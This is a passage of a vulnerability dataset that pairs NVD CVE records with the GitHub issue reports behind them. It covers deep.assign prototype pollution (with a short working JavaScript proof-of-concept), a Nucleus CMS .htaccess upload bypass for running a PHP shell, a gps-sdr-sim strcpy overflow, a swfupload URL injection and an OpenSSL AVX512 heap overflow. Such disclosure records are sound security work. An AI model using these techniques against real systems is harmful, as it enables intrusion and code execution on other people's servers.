Internet, or * You understand what are you doing exactly and do not care about ReDoS attacks. ## Revisions ### Rev. 1 Initial report. ### Rev. 2 Document the chosen fix in the chapter "Possible fix". Correct some wording and statements. Add two new chapters: "Timeline (in reality)" and "Look back". ### Rev. 3 Minor revision. Document two commits opening up the attack surface again in certain conditions. ### Rev. 4 Fix the statement about `/test/complicated`. ### Rev. 5 Correct some mistakes in the chapter "Timeline (in reality)". ### Rev. 6 Document the last vulnerable Docker image.
[Vulnerability Report Disclosure: ReDoS] Catastrophic Backtracking in User-supplied Regular Expression
https://api.github.com/repos/DIYgod/RSSHub/issues/10045/comments
2
2022-06-26T18:02:17Z
2023-11-16T14:28:44Z
https://github.com/DIYgod/RSSHub/issues/10045
1,284,990,825
10,045
3,807
CVE-2021-40663
2022-06-30T12:15:08.297
deep.assign npm package 0.0.0-alpha.0 is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution').
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/janbialostok/deep-assign/issues/1" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220826-0002/" }, { "source": "cve@mitre.org", "tags": [ "Product", "Third Party Advisory" ], "url": "https://www.npmjs.com/package/deep.assign" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/janbialostok/deep-assign/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220826-0002/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product", "Third Party Advisory" ], "url": "https://www.npmjs.com/package/deep.assign" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:deep.assign_project:deep.assign:0.0.0:alpha0:*:*:*:node.js:*:*", "matchCriteriaId": "A7CA3464-30FF-4360-901F-888E3B2C9A64", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "1321" ]
1321
https://github.com/janbialostok/deep-assign/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "janbialostok", "deep-assign" ]
✍️ Description [deep.assign](https://www.npmjs.com/package/deep.assign) npm package is vulnerable to prototype pollution vulnerability prior to version 0.0.0-alpha.0. 🕵️‍♂️ Proof of Concept [LIVE POC LINK](https://runkit.com/embed/hxpxvkppf5x5) ``` var deepAssign = require("deep.assign@0.0.0-alpha.0") var obj=JSON.parse('{"__proto__":{"polluted":1}}') var obj1 = {"red":"apple"} console.log("Before:"+{}.polluted) var c=deepAssign.deepAssign(obj1,obj) console.log("After:"+{}.polluted) ``` 💥 Impact May lead to Information Disclosure/DoS/RCE. External References for similar vulnerabilities/blogs: https://medium.com/node-modules/what-is-prototype-pollution-and-why-is-it-such-a-big-deal-2dd8d89a93c https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26707
Prototype Pollution in deep.assign npm package
https://api.github.com/repos/janbialostok/deep-assign/issues/1/comments
1
2021-09-06T04:52:21Z
2022-07-02T01:50:42Z
https://github.com/janbialostok/deep-assign/issues/1
988,764,102
1
3,808
CVE-2021-37770
2022-06-30T15:15:07.947
Nucleus CMS v3.71 is affected by a file upload vulnerability. In this vulnerability, we can use upload to change the upload path to the path without the Htaccess file. Upload an Htaccess file and write it to AddType application / x-httpd-php.jpg. In this way, an attacker can upload a picture with shell, treat it as PHP, execute commands, so as to take down website resources.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/NucleusCMS/NucleusCMS/issues/96" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://shimo.im/docs/Ch9CphJt8XwTvQ3d" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/NucleusCMS/NucleusCMS/issues/96" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://shimo.im/docs/Ch9CphJt8XwTvQ3d" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:nucleuscms:nucleus_cms:3.71:*:*:*:*:*:*:*", "matchCriteriaId": "4419BE1B-193F-4EB5-A88B-B20D647D0215", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/NucleusCMS/NucleusCMS/issues/96
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "NucleusCMS", "NucleusCMS" ]
Description: I found a file upload vulnerability. In this vulnerability, we can use upload to change the upload path to the path without. Htaccess file. Upload an. Htaccess file and write it to AddType application / x-httpd-php.jpg. In this way, we can upload a picture with shell, treat it as PHP, execute our commands, so as to take down the whole website Resources and permissions for. Because I don't know why my picture can't be uploaded, so I wrote the detailed utilization process in this page, hope you can see it https://shimo.im/docs/Ch9CphJt8XwTvQ3d I would like to submit this vulnerability to CVE mitre. I hope you can fix this vulnerability as soon as possible Looking forward to your response.
File upload vulnerability in Nucleus CMS v3.71
https://api.github.com/repos/NucleusCMS/NucleusCMS/issues/96/comments
2
2019-12-02T16:20:24Z
2021-07-26T02:28:29Z
https://github.com/NucleusCMS/NucleusCMS/issues/96
531,236,423
96
3,809
CVE-2021-37778
2022-06-30T15:15:07.993
There is a buffer overflow in gps-sdr-sim v1.0 when parsing long command line parameters, which can lead to DoS or code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/osqzss/gps-sdr-sim/issues/294" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/osqzss/gps-sdr-sim/issues/294" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gps-sdr-sim_project:gps-sdr-sim:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "F330E7D7-76B4-49E0-A661-EF68376EDFC6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/osqzss/gps-sdr-sim/issues/294
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "osqzss", "gps-sdr-sim" ]
Hi friends! When the parameter length is greater than 100 characters of MAX_CHAR, the strcpy function overflows. A length check can be performed to fix the problem. ```c #define MAX_CHAR (100) char umfile[MAX_CHAR]; char navfile[MAX_CHAR]; char outfile[MAX_CHAR]; ``` ```c while ((result=getopt(argc,argv,"e:u:g:c:l:o:s:b:T:t:d:iv"))!=-1) { switch (result) { case 'e': strcpy(navfile, optarg); break; case 'u': strcpy(umfile, optarg); nmeaGGA = FALSE; break; case 'g': strcpy(umfile, optarg); nmeaGGA = TRUE; break; case 'c': // Static ECEF coordinates input mode staticLocationMode = TRUE; sscanf(optarg,"%lf,%lf,%lf",&xyz[0][0],&xyz[0][1],&xyz[0][2]); break; case 'l': // Static geodetic coordinates input mode // Added by scateu@gmail.com staticLocationMode = TRUE; sscanf(optarg,"%lf,%lf,%lf",&llh[0],&llh[1],&llh[2]); llh[0] = llh[0] / R2D; // convert to RAD llh[1] = llh[1] / R2D; // convert to RAD llh2xyz(llh,xyz[0]); // Convert llh to xyz break; case 'o': strcpy(outfile, optarg); break; ```
There is a buffer overflow when parsing command line parameters
https://api.github.com/repos/osqzss/gps-sdr-sim/issues/294/comments
1
2021-07-23T13:23:33Z
2023-10-20T10:06:57Z
https://github.com/osqzss/gps-sdr-sim/issues/294
951,577,485
294
3,810
CVE-2022-31112
2022-06-30T17:15:07.977
Parse Server is an open source backend that can be deployed to any infrastructure that can run Node.js. In affected versions parse Server LiveQuery does not remove protected fields in classes, passing them to the client. The LiveQueryController now removes protected fields from the client response. Users are advised to upgrade. Users unable t upgrade should use `Parse.Cloud.afterLiveQueryEvent` to manually remove protected fields.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4.2, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 4.2, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/commit/309f64ced8700321df056fb3cc97f15007a00df1" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/commit/9fd4516cde5c742f9f29dd05468b4a43a85639a6" }, { "source": "security-advisories@github.com", "tags": [ "Issue Tracking", "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/issues/8073" }, { "source": "security-advisories@github.com", "tags": [ "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/pull/8074" }, { "source": "security-advisories@github.com", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/releases/tag/5.2.4" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-crrq-vr9j-fxxh" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/commit/309f64ced8700321df056fb3cc97f15007a00df1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/commit/9fd4516cde5c742f9f29dd05468b4a43a85639a6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/issues/8073" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Release Notes", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/pull/8074" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Release Notes", "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/releases/tag/5.2.4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/parse-community/parse-server/security/advisories/GHSA-crrq-vr9j-fxxh" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "9C3D4EDC-0BE1-411C-93E3-2351A4E7B3D6", "versionEndExcluding": "4.10.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:parseplatform:parse-server:*:*:*:*:*:node.js:*:*", "matchCriteriaId": "19505592-808A-437A-8893-FA009C4CA575", "versionEndExcluding": "5.2.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "5.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "212" ]
212
https://github.com/parse-community/parse-server/issues/8073
[ "Issue Tracking", "Patch", "Release Notes", "Third Party Advisory" ]
github.com
[ "parse-community", "parse-server" ]
null
fix: protected fields exposed via LiveQuery (GHSA-crrq-vr9j-fxxh)
https://api.github.com/repos/parse-community/parse-server/issues/8073/comments
3
2022-06-26T20:40:03Z
2022-07-02T09:21:17Z
https://github.com/parse-community/parse-server/pull/8073
1,285,025,776
8,073
3,811
CVE-2013-4144
2022-06-30T18:15:08.557
There is an object injection vulnerability in swfupload plugin for wordpress.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wordpress/secure-swfupload/issues/1" }, { "source": "secalert@redhat.com", "tags": [ "Mailing List" ], "url": "https://www.openwall.com/lists/oss-security/2013/07/18/10" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/wordpress/secure-swfupload/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List" ], "url": "https://www.openwall.com/lists/oss-security/2013/07/18/10" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swfupload_project:swfupload:3.5.2:*:*:*:*:wordpress:*:*", "matchCriteriaId": "C077E743-7719-429C-8D0B-F2BC3CE43B2C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "74" ]
74
https://github.com/wordpress/secure-swfupload/issues/1
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "wordpress", "secure-swfupload" ]
I've received a few reports today of an image object injection problem in swfupload affecting WordPress. I'm filing this public issue here after contacting swfupload-security@wordpress.org and being asked to do so (as this issue is already public knowledge). There's an object injection "vulnerability" in swfupload, as shown by this demo URL: https://wordpress.org/news/wp-includes/js/swfupload/swfupload.swf?buttonImageURL=http://1337day.com/img/logo_green.jpg Known advisories for this issue: http://1337day.com/exploit/20669 http://bot24.blogspot.com/2013/04/swfupload-object-injectioncsrf.html This was tested on WordPress 3.5.2. As discussed on e-mail, there are three basic options: - Remove buttonImageURL - Restrict buttonImageURL to same origin - Ignore the issue My recommendation would be to restrict buttonImageURL to the same origin as the blog site, as swfupload is already deprecated, and I'd rather it be secure but slightly broken than have a known issue that could be used for spoofing or other issues. Thanks!
Image object injection vulnerability via 'buttonImageURL' parameter
https://api.github.com/repos/WordPress/secure-swfupload/issues/1/comments
11
2013-07-03T18:00:54Z
2015-03-22T07:21:12Z
https://github.com/WordPress/secure-swfupload/issues/1
16,332,126
1
3,812
CVE-2022-2274
2022-07-01T08:15:07.687
The OpenSSL 3.0.4 release introduced a serious bug in the RSA implementation for X86_64 CPUs supporting the AVX512IFMA instructions. This issue makes the RSA implementation with 2048 bit private keys incorrect on such machines and memory corruption will happen during the computation. As a consequence of the memory corruption an attacker may be able to trigger a remote code execution on the machine performing the computation. SSL/TLS servers or other servers using 2048 bit RSA private keys running on machines supporting AVX512IFMA instructions of the X86_64 architecture are affected by this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 10, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 10, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "openssl-security@openssl.org", "tags": null, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=4d8a88c134df634ba610ff8db1eb8478ac5fd345" }, { "source": "openssl-security@openssl.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openssl/openssl/issues/18625" }, { "source": "openssl-security@openssl.org", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220715-0010/" }, { "source": "openssl-security@openssl.org", "tags": [ "Vendor Advisory" ], "url": "https://www.openssl.org/news/secadv/20220705.txt" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=4d8a88c134df634ba610ff8db1eb8478ac5fd345" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/openssl/openssl/issues/18625" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.netapp.com/advisory/ntap-20220715-0010/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://www.openssl.org/news/secadv/20220705.txt" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openssl:openssl:3.0.4:*:*:*:*:*:*:*", "matchCriteriaId": "064E8433-3B62-4C85-868C-58BFD3E8FD49", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", "matchCriteriaId": "BDFB1169-41A0-4A86-8E4F-FDA9730B1E94", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h410c_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "234DEFE0-5CE5-4B0A-96B8-5D227CB8ED31", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h410c:-:*:*:*:*:*:*:*", "matchCriteriaId": "CDDF61B7-EC5C-467C-B710-B89F502CD04F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h300s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "6770B6C3-732E-4E22-BF1C-2D2FD610061C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h300s:-:*:*:*:*:*:*:*", "matchCriteriaId": "9F9C8C20-42EB-4AB5-BD97-212DEB070C43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h500s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "7FFF7106-ED78-49BA-9EC5-B889E3685D53", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h500s:-:*:*:*:*:*:*:*", "matchCriteriaId": "E63D8B0F-006E-4801-BF9D-1C001BBFB4F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h700s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "56409CEC-5A1E-4450-AA42-641E459CC2AF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h700s:-:*:*:*:*:*:*:*", "matchCriteriaId": "B06F4839-D16A-4A61-9BB5-55B13F41E47F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:netapp:h410s_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "D0B4AD8A-F172-4558-AEC6-FF424BA2D912", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:h:netapp:h410s:-:*:*:*:*:*:*:*", "matchCriteriaId": "8497A4C9-8474-4A62-8331-3FE862ED4098", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "787" ]
787
https://github.com/openssl/openssl/issues/18625
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "openssl", "openssl" ]
Build OpenSSL-3.0.4 on a CPU with AVX512 (my CPU is a Core i7-1065G7) with: ``` CFLAGS="-O3 -g -fsanitize=address" ./config make ``` Run a test: ``` make V=1 TESTS=test_exp test ``` The sanitizer complains: ``` ==481618==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60c000089400 at pc 0x7f01e32a9509 bp 0x7fff643ec100 sp 0x7fff643ec0f8 READ of size 8 at 0x60c000089400 thread T0 #0 0x7f01e32a9508 in bn_select_words crypto/bn/rsaz_exp.h:64 #1 0x7f01e32a9508 in bn_reduce_once_in_place crypto/bn/rsaz_exp.h:74 #2 0x7f01e32a9508 in ossl_rsaz_mod_exp_avx512_x2 crypto/bn/rsaz_exp_x2.c:223 #3 0x7f01e3287dc8 in BN_mod_exp_mont_consttime_x2 crypto/bn/bn_exp.c:1448 #4 0x4042c3 in test_mod_exp_x2 test/exptest.c:260 #5 0x40611a in run_tests test/testutil/driver.c:370 #6 0x4039ba in main test/testutil/main.c:30 #7 0x7f01e2c29319 in __libc_start_call_main (/usr/lib/libc.so.6+0x29319) #8 0x7f01e2c293e4 in __libc_start_main_impl (/usr/lib/libc.so.6+0x293e4) #9 0x403c40 in _start (/home/xry111/sources/lfs/openssl-3.0.4/test/exptest+0x403c40) 0x60c000089400 is located 0 bytes to the right of 128-byte region [0x60c000089380,0x60c000089400) allocated by thread T0 here: #0 0x7f01e3ae5107 in __interceptor_malloc ../../../../libsanitizer/asan/asan_malloc_linux.cpp:69 #1 0x7f01e34aa7a8 in CRYPTO_zalloc crypto/mem.c:197 SUMMARY: AddressSanitizer: heap-buffer-overflow crypto/bn/rsaz_exp.h:64 in bn_select_words Shadow bytes around the buggy address: 0x0c1880009230: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c1880009240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1880009250: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1880009260: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa 0x0c1880009270: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c1880009280:[fa]fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1880009290: 00 00 00 00 00 00 00 00 fa fa fa fa fa 